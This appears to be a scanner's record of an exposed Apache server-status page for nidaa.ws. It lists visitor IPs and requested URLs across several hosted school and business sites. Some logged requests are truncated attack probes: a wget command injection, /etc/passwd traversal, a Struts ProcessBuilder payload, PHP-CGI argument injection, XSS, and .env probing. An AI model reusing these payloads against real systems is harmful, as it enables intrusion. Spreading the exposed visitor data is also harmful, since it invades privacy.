      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-5240291/619/4349K
      67.941132380360.828.61609.85
      172.71.166.31http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-5240290/513/3703_
      67.9076216872120.070.39502.67
      178.20.44.82http/1.1php.we3dvi.com:80GET / HTTP/1.1
      
      0-5240290/540/4036_
      67.92462219773420.0136.97580.21
      66.249.64.12http/1.1albayan.edu.sa:443GET /albayan_library/Categorys3.php?sec=351 HTTP/1.1
      
      0-5240290/459/3856_
      67.8627122349619970.095.07506.15
      66.249.64.12http/1.1albayan.edu.sa:443GET /albayan_library/Categorys3.php?sec=319 HTTP/1.1
      
      0-5240290/502/3997_
      67.891841207728200960.099.91654.36
      51.39.31.34http/1.1albayan.edu.sa:443GET /imgweb/file44/WBs%20on%20Site%2022-23/7th/7th%20BS-T%201-2
      
      0-5240290/470/3745_
      67.73553431871200.0180.63601.19
      172.70.47.63http/1.1eg.daaris.com:443POST /wp-plain.php HTTP/1.1
      
      0-5240290/462/3924_
      67.933326674910.0112.32538.49
      162.158.94.116http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-5240290/447/3733_
      67.9162324301690.074.00616.97
      149.28.51.146http/1.1n.jawad.com.sa:443HEAD /bc HTTP/1.1
      
      0-5240290/524/4356_
      67.77547330394950.054.15652.61
      176.18.115.207http/1.1zed.sa:443GET /menu/wp-content/plugins/jet-tricks/assets/js/lib/tippy/tip
      
      0-5240290/406/3888_
      67.27777227726080.0245.22698.97
      89.64.45.67http/1.1
      
      0-5240290/446/3462_
      66.974011224229690.027.49463.45
      5.109.9.221http/1.1
      
      0-5240290/571/4346_
      67.83371324081880.047.66399.88
      141.164.133.224http/1.1albayan.edu.sa:443GET /e_sch/images/footer.jpg HTTP/1.1
      
      0-5240290/432/3906_
      67.35501033797870.073.55811.25
      172.232.50.72http/1.1
      
      0-5240290/521/3981_
      67.7940910325579190.0152.29753.27
      94.32.111.10http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      0-5240290/514/4100_
      67.71664334230870.053.68502.74
      5.41.192.178http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-5240290/494/3757_
      67.70669017806230.039.99582.11
      52.167.144.16http/1.1albayan.edu.sa:80GET /web/37.html2 HTTP/1.1
      
      0-5240290/521/3677_
      67.90123322576110.058.33655.62
      51.253.165.71http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-5240290/579/3958_
      67.90751425530400.086.61580.91
      178.20.44.82http/1.1php.we3dvi.com:80POST /redmine/.env HTTP/1.1
      
      0-5240290/551/4165_
      67.8724062619469180.0109.50623.55
      66.249.64.12http/1.1albayan.edu.sa:443GET /albayan_library/upload/books/________________%20__________
      
      0-5240291/555/3962K
      67.933130634440.9104.38527.61
      172.70.251.25http/1.1nidaa.ws:80GET /_all_dbs HTTP/1.1
      
      0-5240290/376/3743_
      67.91732195864780.050.84480.72
      178.20.44.82http/1.1php.we3dvi.com:80GET /sapi/debug/default/view HTTP/1.1
      
      0-5240290/480/3885_
      67.735955919756770.074.98537.33
      5.255.231.12http/1.13dvi.com:443GET /images/ HTTP/1.1
      
      0-5240290/445/3843_
      67.29676226545210.0123.33615.66
      51.36.173.46http/1.1
      
      0-5240290/540/4065_
      67.843221319508900.0106.01538.16
      66.249.64.12http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=1176 HTTP/1.1
      
      0-5240290/412/4025_
      67.8335475422321980.073.46682.96
      95.178.86.227http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/12/1E3A0805-scaled.jpg HTTP/1.1
      
      1-5277640/407/3485_
      64.1553242940347840.0163.33743.30
      51.253.165.71http/1.1albayan.edu.sa:443GET /imgweb/1445/8th-T3-QB%20-BS-2024.pdf HTTP/1.1
      
      1-5277640/496/3813_
      64.252646936840790.0146.75613.24
      37.107.13.41http/1.1albayan.edu.sa:443GET /imgweb/1445/4th-5th-6th%20BS%20QB%20T3-2023-2024.pdf HTTP/
      
      1-5277640/481/4014_
      64.2460327085510.095.03646.21
      149.28.51.146http/1.1n.jawad.com.sa:443HEAD /new HTTP/1.1
      
      1-5277640/572/3876_
      63.5226248728020300.067.21588.59
      5.41.48.169http/1.1
      
      1-5277640/441/3717_
      64.22106328934890.052.35515.18
      51.253.165.71http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      1-5277640/460/3594_
      63.66525122172410.062.61483.80
      51.39.199.110http/1.1
      
      1-5277641/462/3692K
      64.273129447180.991.39549.30
      172.71.246.29http/1.1nidaa.ws:80GET /s/33e27393e2431313e2838313/_/;/META-INF/maven/com.atlassia
      
      1-5277640/433/3746_
      64.1167010129370000.050.65506.91
      5.41.192.178http/1.1albayan.edu.sa:443GET /school/school/image_max/web/image_news/________2_4.png HTT
      
      1-5277640/394/3508_
      
      Found on 2024-05-29 11:24
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a831400b89e519

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Wednesday, 29-May-2024 14:24:18 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  6 days 10 hours 19 minutes 28 seconds
      Server load: 0.05 0.05 0.08
      Total accesses: 869391 - Total Traffic: 126.0 GB - Total Duration: 967128649
      CPU Usage: u700.29 s104.36 cu3408.14 cs744.57 - .892% CPU load
      1.56 requests/sec - 237.8 kB/second - 152.0 kB/request - 1112.42 ms/request
      10 requests currently being processed, 0 workers gracefully restarting, 240 idle workers
      ________________________________________________K_______________
      __________________________________K________________W_________WWW
      WWWWWWWWWWWWWWWWWWWWWW______________K__________K_____R__________
      _________________K________________R_K___________________________
      ________________K__.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-5240290/618/4348_
      67.69780232380330.028.61609.85
      66.249.64.12http/1.1albayan.edu.sa:443GET /e_sch/includes/skins/kollection/cal.css HTTP/1.1
      
      0-5240290/513/3703_
      67.9072216872120.070.39502.67
      178.20.44.82http/1.1php.we3dvi.com:80GET / HTTP/1.1
      
      0-5240290/540/4036_
      67.92432219773420.0136.97580.21
      66.249.64.12http/1.1albayan.edu.sa:443GET /albayan_library/Categorys3.php?sec=351 HTTP/1.1
      
      0-5240290/459/3856_
      67.8626822349619970.095.07506.15
      66.249.64.12http/1.1albayan.edu.sa:443GET /albayan_library/Categorys3.php?sec=319 HTTP/1.1
      
      0-5240290/502/3997_
      67.891811207728200960.099.91654.36
      51.39.31.34http/1.1albayan.edu.sa:443GET /imgweb/file44/WBs%20on%20Site%2022-23/7th/7th%20BS-T%201-2
      
      0-5240290/470/3745_
      67.73550431871200.0180.63601.19
      172.70.47.63http/1.1eg.daaris.com:443POST /wp-plain.php HTTP/1.1
      
      0-5240290/462/3924_
      67.930326674910.0112.32538.49
      162.158.94.116http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-5240290/447/3733_
      67.9158324301690.074.00616.97
      149.28.51.146http/1.1n.jawad.com.sa:443HEAD /bc HTTP/1.1
      
      0-5240290/524/4356_
      67.77543330394950.054.15652.61
      176.18.115.207http/1.1zed.sa:443GET /menu/wp-content/plugins/jet-tricks/assets/js/lib/tippy/tip
      
      0-5240290/406/3888_
      67.27773227726080.0245.22698.97
      89.64.45.67http/1.1
      
      0-5240290/446/3462_
      66.973981224229690.027.49463.45
      5.109.9.221http/1.1
      
      0-5240290/571/4346_
      67.83367324081880.047.66399.88
      141.164.133.224http/1.1albayan.edu.sa:443GET /e_sch/images/footer.jpg HTTP/1.1
      
      0-5240290/432/3906_
      67.35498033797870.073.55811.25
      172.232.50.72http/1.1
      
      0-5240290/521/3981_
      67.7940510325579190.0152.29753.27
      94.32.111.10http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      0-5240290/514/4100_
      67.71660334230870.053.68502.74
      5.41.192.178http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-5240290/494/3757_
      67.70666017806230.039.99582.11
      52.167.144.16http/1.1albayan.edu.sa:80GET /web/37.html2 HTTP/1.1
      
      0-5240290/521/3677_
      67.90120322576110.058.33655.62
      51.253.165.71http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-5240290/579/3958_
      67.90711425530400.086.61580.91
      178.20.44.82http/1.1php.we3dvi.com:80POST /redmine/.env HTTP/1.1
      
      0-5240290/551/4165_
      67.8723762619469180.0109.50623.55
      66.249.64.12http/1.1albayan.edu.sa:443GET /albayan_library/upload/books/________________%20__________
      
      0-5240290/554/3961_
      67.28796330634410.0104.38527.61
      5.41.37.219http/1.1
      
      0-5240290/376/3743_
      67.91702195864780.050.84480.72
      178.20.44.82http/1.1php.we3dvi.com:80GET /sapi/debug/default/view HTTP/1.1
      
      0-5240290/480/3885_
      67.735925919756770.074.98537.33
      5.255.231.12http/1.13dvi.com:443GET /images/ HTTP/1.1
      
      0-5240290/445/3843_
      67.29672226545210.0123.33615.66
      51.36.173.46http/1.1
      
      0-5240290/540/4065_
      67.843191319508900.0106.01538.16
      66.249.64.12http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=1176 HTTP/1.1
      
      0-5240290/412/4025_
      67.8335075422321980.073.46682.96
      95.178.86.227http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/12/1E3A0805-scaled.jpg HTTP/1.1
      
      1-5277640/407/3485_
      64.1552842940347840.0163.33743.30
      51.253.165.71http/1.1albayan.edu.sa:443GET /imgweb/1445/8th-T3-QB%20-BS-2024.pdf HTTP/1.1
      
      1-5277640/496/3813_
      64.252346936840790.0146.75613.24
      37.107.13.41http/1.1albayan.edu.sa:443GET /imgweb/1445/4th-5th-6th%20BS%20QB%20T3-2023-2024.pdf HTTP/
      
      1-5277640/481/4014_
      64.2457327085510.095.03646.21
      149.28.51.146http/1.1n.jawad.com.sa:443HEAD /new HTTP/1.1
      
      1-5277640/572/3876_
      63.5225848728020300.067.21588.59
      5.41.48.169http/1.1
      
      1-5277640/441/3717_
      64.22102328934890.052.35515.18
      51.253.165.71http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      1-5277640/460/3594_
      63.66522122172410.062.61483.80
      51.39.199.110http/1.1
      
      1-5277640/461/3691_
      63.88836329447140.091.39549.30
      5.41.37.219http/1.1albayan.edu.sa:443GET /web/images/title.jpg HTTP/1.1
      
      1-5277640/433/3746_
      64.1166710129370000.050.65506.91
      5.41.192.178http/1.1albayan.edu.sa:443GET /school/school/image_max/web/image_news/________2_4.png HTT
      
      1-5277640/394/3508_
      64.20300415
      Found on 2024-05-29 11:24
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140dc3d1b4f

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Tuesday, 28-May-2024 11:30:34 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  5 days 7 hours 25 minutes 44 seconds
      Server load: 0.62 0.45 0.40
      Total accesses: 732292 - Total Traffic: 103.4 GB - Total Duration: 773720374
      CPU Usage: u310.58 s26.27 cu3126.37 cs689.61 - .905% CPU load
      1.6 requests/sec - 236.3 kB/second - 148.0 kB/request - 1056.57 ms/request
      30 requests currently being processed, 0 workers gracefully restarting, 195 idle workers
      __K______________K_K_________K______________K_K_K__________K_KK_
      _____________K________W_KR_______________________C_K______K_K___
      __K_________K___________________K__K_________KKKK_______________
      __K_____________W_______K____K___...............................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-5121020/195/3628_
      14.6931129681300.05.98557.81
      185.23.253.150http/1.1albayan.edu.sa:443GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http:/
      
      0-5121020/88/3114_
      14.6382415531880.06.17428.38
      185.23.253.150http/1.1albayan.edu.sa:443GET /index.php?option=com_bfsurvey&controller=../../../../../..
      
      0-5121021/172/3411K
      14.710114951700.86.58437.41
      172.70.251.82http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-5121020/116/3283_
      14.683670347304240.035.73407.70
      185.23.253.150http/1.1albayan.edu.sa:443GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuild
      
      0-5121020/140/3411_
      14.7137126059250.09.60549.97
      185.23.253.150http/1.1albayan.edu.sa:443GET /cgi-bin/test HTTP/1.1
      
      0-5121020/117/3181_
      14.6838226990720.08.08410.59
      185.23.253.150http/1.1albayan.edu.sa:443GET /cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo HT
      
      0-5121020/123/3388_
      14.60109024802470.08.63423.68
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=5&q=1188&t=65.108.0.71&c=5 HTTP/1
      
      0-5121020/92/3211_
      14.61108321345840.09.78540.91
      185.23.253.150http/1.1albayan.edu.sa:443GET /src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%2
      
      0-5121020/96/3748_
      14.6277129113730.010.31596.64
      47.128.46.205http/1.1daris.live:80GET /bin/admin/files/ux.svg HTTP/1.1
      
      0-5121020/117/3360_
      14.6372018060940.05.16444.56
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=5&q=1191&t=65.108.0.71&c=5 HTTP/1
      
      0-5121020/129/2924_
      14.64693222069770.05.55432.65
      185.23.253.150http/1.1albayan.edu.sa:443GET /document.php?modulepart=project&file=../../../../../../../
      
      0-5121020/110/3677_
      14.66504120801480.04.29348.95
      91.92.253.4http/1.1jawad.com.sa:443GET /index.php/amogrid/adminhtml_settings/index HTTP/1.1
      
      0-5121020/78/3382_
      14.67465828768820.041.66723.01
      185.23.253.150http/1.1albayan.edu.sa:443POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%
      
      0-5121020/172/3373_
      14.6196020065340.011.43596.16
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=5&q=1189&t=65.108.0.71&c=5 HTTP/1
      
      0-5121020/130/3490_
      14.601206030644100.07.59444.90
      185.23.253.150http/1.1albayan.edu.sa:443GET /index.php?option=com_bfsurvey&controller=../../../../../..
      
      0-5121020/88/3132_
      14.6566013196900.03.03530.75
      185.23.253.150http/1.1albayan.edu.sa:443GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1
      
      0-5121020/101/3069_
      14.6653119651180.010.13588.57
      5.109.39.82http/1.1zed.sa:443GET /menu/wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.
      
      0-5121021/119/3278K
      14.710121181580.914.70491.12
      162.158.94.79http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-5121020/161/3500_
      14.7021318151100.014.29505.66
      185.23.253.150http/1.1albayan.edu.sa:443GET /cgi-bin/test HTTP/1.1
      
      0-5121021/114/3300K
      14.7101272086966.66.70409.79
      172.70.247.87http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-5121020/112/3277_
      14.6750125615000.05.70428.12
      185.23.253.150http/1.1albayan.edu.sa:443GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuild
      
      0-5121020/131/3339_
      14.6189017205920.02.78453.84
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=5&q=1190&t=195.191.219.131&c=5 HT
      
      0-5121020/98/3313_
      14.7021520718700.02.82486.89
      185.23.253.150http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      0-5121020/168/3451_
      14.7012016913740.04.01429.29
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      0-5121020/93/3503_
      14.6186319135440.04.65603.57
      185.23.253.150http/1.1albayan.edu.sa:443GET /index.php?option=com_perchadownloadsattach&controller=../.
      
      1-5121320/100/3007_
      16.23635736472500.029.60576.99
      185.23.253.150http/1.1albayan.edu.sa:443GET /ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../
      
      1-5121320/106/3220_
      16.2169452030260230.09.85463.81
      47.128.46.205http/1.1daris.live:80GET /bin/admin/Banners-02.jpg HTTP/1.1
      
      1-5121320/201/3454_
      16.3420322095410.011.67531.09
      185.23.253.150http/1.1albayan.edu.sa:443GET /document.php?modulepart=project&file=../../../../../../../
      
      1-5121320/91/3225_
      16.3135421536470.048.47469.08
      185.23.253.150http/1.1albayan.edu.sa:443GET /index.php?option=com_canteen&controller=../../../../../etc
      
      1-51213233/112/3161K
      16.3712165967726.426.77456.71
      195.191.219.132http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=5&q=1195&t=144.76.60.198&c=5 HTTP
      
      1-5121320/172/3059_
      16.3421315296880.069.69401.19
      
      Found on 2024-05-28 08:30
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140aae002e0

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Tuesday, 28-May-2024 11:30:33 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  5 days 7 hours 25 minutes 44 seconds
      Server load: 0.62 0.45 0.40
      Total accesses: 732279 - Total Traffic: 103.4 GB - Total Duration: 773720229
      CPU Usage: u310.54 s26.27 cu3126.37 cs689.61 - .905% CPU load
      1.6 requests/sec - 236.3 kB/second - 148.0 kB/request - 1056.59 ms/request
      16 requests currently being processed, 0 workers gracefully restarting, 209 idle workers
      _________________K_K_________K______________K_W_______________K_
      ________________________KR_______________________K_K____________
      __K_____________________________K__K____________K_______________
      __K__________________________K___...............................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-5121020/195/3628_
      14.6931129681300.05.98557.81
      185.23.253.150http/1.1albayan.edu.sa:443GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http:/
      
      0-5121020/88/3114_
      14.6382415531880.06.17428.38
      185.23.253.150http/1.1albayan.edu.sa:443GET /index.php?option=com_bfsurvey&controller=../../../../../..
      
      0-5121020/171/3410_
      14.59126414951680.06.57437.41
      185.23.253.150http/1.1albayan.edu.sa:443GET /index.php?option=com_bfsurvey&controller=../../../../../..
      
      0-5121020/116/3283_
      14.683670347304240.035.73407.70
      185.23.253.150http/1.1albayan.edu.sa:443GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuild
      
      0-5121020/140/3411_
      14.7137126059250.09.60549.97
      185.23.253.150http/1.1albayan.edu.sa:443GET /cgi-bin/test HTTP/1.1
      
      0-5121020/117/3181_
      14.6838226990720.08.08410.59
      185.23.253.150http/1.1albayan.edu.sa:443GET /cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo HT
      
      0-5121020/123/3388_
      14.60109024802470.08.63423.68
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=5&q=1188&t=65.108.0.71&c=5 HTTP/1
      
      0-5121020/92/3211_
      14.61108321345840.09.78540.91
      185.23.253.150http/1.1albayan.edu.sa:443GET /src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%2
      
      0-5121020/96/3748_
      14.6277129113730.010.31596.64
      47.128.46.205http/1.1daris.live:80GET /bin/admin/files/ux.svg HTTP/1.1
      
      0-5121020/117/3360_
      14.6372018060940.05.16444.56
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=5&q=1191&t=65.108.0.71&c=5 HTTP/1
      
      0-5121020/129/2924_
      14.64693222069770.05.55432.65
      185.23.253.150http/1.1albayan.edu.sa:443GET /document.php?modulepart=project&file=../../../../../../../
      
      0-5121020/110/3677_
      14.66494120801480.04.29348.95
      91.92.253.4http/1.1jawad.com.sa:443GET /index.php/amogrid/adminhtml_settings/index HTTP/1.1
      
      0-5121020/78/3382_
      14.67465828768820.041.66723.01
      185.23.253.150http/1.1albayan.edu.sa:443POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%
      
      0-5121020/172/3373_
      14.6195020065340.011.43596.16
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=5&q=1189&t=65.108.0.71&c=5 HTTP/1
      
      0-5121020/130/3490_
      14.601206030644100.07.59444.90
      185.23.253.150http/1.1albayan.edu.sa:443GET /index.php?option=com_bfsurvey&controller=../../../../../..
      
      0-5121020/88/3132_
      14.6566013196900.03.03530.75
      185.23.253.150http/1.1albayan.edu.sa:443GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1
      
      0-5121020/101/3069_
      14.6653119651180.010.13588.57
      5.109.39.82http/1.1zed.sa:443GET /menu/wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.
      
      0-5121021/119/3278K
      14.710121181580.914.70491.12
      162.158.94.79http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-5121020/161/3500_
      14.7021318151100.014.29505.66
      185.23.253.150http/1.1albayan.edu.sa:443GET /cgi-bin/test HTTP/1.1
      
      0-5121021/114/3300K
      14.7101272086966.66.70409.79
      172.70.247.87http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-5121020/112/3277_
      14.6750125615000.05.70428.12
      185.23.253.150http/1.1albayan.edu.sa:443GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuild
      
      0-5121020/131/3339_
      14.6189017205920.02.78453.84
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=5&q=1190&t=195.191.219.131&c=5 HT
      
      0-5121020/98/3313_
      14.7021520718700.02.82486.89
      185.23.253.150http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      0-5121020/168/3451_
      14.7011016913740.04.01429.29
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      0-5121020/93/3503_
      14.6186319135440.04.65603.57
      185.23.253.150http/1.1albayan.edu.sa:443GET /index.php?option=com_perchadownloadsattach&controller=../.
      
      1-5121320/100/3007_
      16.23635736472500.029.60576.99
      185.23.253.150http/1.1albayan.edu.sa:443GET /ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../
      
      1-5121320/106/3220_
      16.2168452030260230.09.85463.81
      47.128.46.205http/1.1daris.live:80GET /bin/admin/Banners-02.jpg HTTP/1.1
      
      1-5121320/201/3454_
      16.3420322095410.011.67531.09
      185.23.253.150http/1.1albayan.edu.sa:443GET /document.php?modulepart=project&file=../../../../../../../
      
      1-5121320/91/3225_
      16.3135421536470.048.47469.08
      185.23.253.150http/1.1albayan.edu.sa:443GET /index.php?option=com_canteen&controller=../../../../../etc
      
      1-51213233/112/3161K
      16.3712165967726.426.77456.71
      195.191.219.132http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=5&q=1195&t=144.76.60.198&c=5 HTTP
      
      1-5121320/172/3059_
      16.3421315296880.069.69
      Found on 2024-05-28 08:30
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a831402e9cb9cf

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Monday, 27-May-2024 12:12:53 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 5
      Parent Server MPM Generation: 4
      Server uptime:  4 days 8 hours 8 minutes 4 seconds
      Server load: 0.19 0.34 0.39
      Total accesses: 599288 - Total Traffic: 85.6 GB - Total Duration: 647435385
      CPU Usage: u400.89 s47.25 cu2437.04 cs538.53 - .913% CPU load
